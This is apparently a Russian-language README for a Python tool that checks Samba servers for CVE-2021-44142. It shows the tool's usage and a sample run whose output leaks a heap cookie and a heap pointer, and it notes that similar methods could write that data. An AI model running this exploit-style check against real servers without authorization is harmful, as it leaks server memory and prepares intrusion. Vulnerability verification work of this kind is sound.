
Python-скрипт для обнаружения и эксплуатации CVE-2021-44142 в серверах Samba, выполняющий дамп heap cookie и указателя через одно SMB-соединение для проверки уязвимости.
Инструмент для проверки того, уязвим ли сервер Samba к CVE-2021-44142
CVE-2021-44142 — это чтение и запись за пределами кучи (heap out-of-bounds read and write) в модуле vfs_fruit сервера Samba, использованное на Pwn2Own Austin 2021 против Western Digital PR4100. Впервые она была обнаружена Nguyễn Hoàng Thạch и Billy Jheng Bing-Jhong из STAR Labs. Orange Tsai из DEVCORE также сообщил об этой уязвимости. Эта работа основана на публикации в блоге 0xsha по адресу https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142.
Этот инструмент демонстрирует уязвимость к CVE-2021-44142, выполняя дамп heap-cookie talloc и указателя связанного списка. Аналогичные методы можно использовать для записи этих данных.
Эта работа развивает работу 0xsha следующим образом:
python check_vulnerable.py
usage: check_vulnerable.py [-h] [--password PASSWORD] server port share user
check_vulnerable.py: error: the following arguments are required: server, port, share, user
python check_vulnerable.py 192.168.1.183 445 TimeMachineBackup Guest
{
"vulnerable": true,
"heap_cookie_leak": "0xfc571370",
"heap_pointer_leak": "0x55e4e717b1b0",
"fail_reason": ""
}